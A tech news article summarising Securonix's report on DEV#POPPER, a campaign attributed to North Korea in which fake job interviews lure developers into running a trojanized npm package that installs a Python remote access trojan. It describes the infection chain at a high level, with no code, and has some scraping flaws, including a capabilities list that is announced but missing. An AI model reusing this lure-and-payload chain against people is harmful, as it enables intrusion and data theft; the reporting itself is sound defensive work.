Cybersecurity company Securonix has discovered a new ongoing social engineering attack campaign that targets software developers with bogus npm packages on the pretext of fake job interviews and tricks them into downloading a Python-based remote access trojan (RAT).
Based on the observed tactics, the Securonix Threat Research Team, which has tracked the activity under DEV#POPPER, has allegedly linked the campaign to North Korean threat actors.
During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub.
The software contained a malicious Node JS payload that, once executed, compromised the developers system,saidsecurity researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov in a blog post.
However, the aim of the threat actor is to deceive targets into downloading malicious software that collects system information and enables remote access to the host.
In the first stage, a zip archive from GitHub disguised as an offer to fill software developer positions is sent to the interviewee (in this case, the developer) for download by the interviewer (the attacker).
The archive contains a legitimate-looking Node Package Manager (NPM) package containing a README.md and Frontend and Backend directories.
Once the developer executes the malicious NPM package, an obfuscated JavaScript file (imageDetails.js) is executed through the NodeJS process (node.exe) using curl commands.
The malicious scripts purpose in the first stage is simply to download an additional archive (p.zi) from an external server.
Inside the archive is the next stage payload, a hidden Python file (.npl) that functions as a RAT.
Depending on their operating system options, this Python file may or may not be hidden from view to the user.
Once the RAT is active on the victims system, it collects system and connection information from an infected computer and then sends this data to the command and control (C2) server, including OS pop in, hostname, OS release version, OS version, the username of the logged-in user, and a unique identifier for the machine (uuid) generated by hashing the MAC address and username.
According to Securonix analysts, the RAT supports the following capabilities:
When it comes to attacks which originate through social engineering, its critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews, the researchers added.
The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and in a much more vulnerable state.
Securonix recommends people remain extra vigilant, as fake job opportunities are often used as bait to infect people with malware.
In the first campaign, Contagious Interview, threat actors posed as employers to lure software developers into installing malware through an interview process that created the potential for various types of theft.
On the other hand, the second campaign, Wagemole, sought unauthorized employment with organizations based in the U.S. and other parts of the world, with potential for both financial gain and espionage.
Read More
source: www.techworm.net
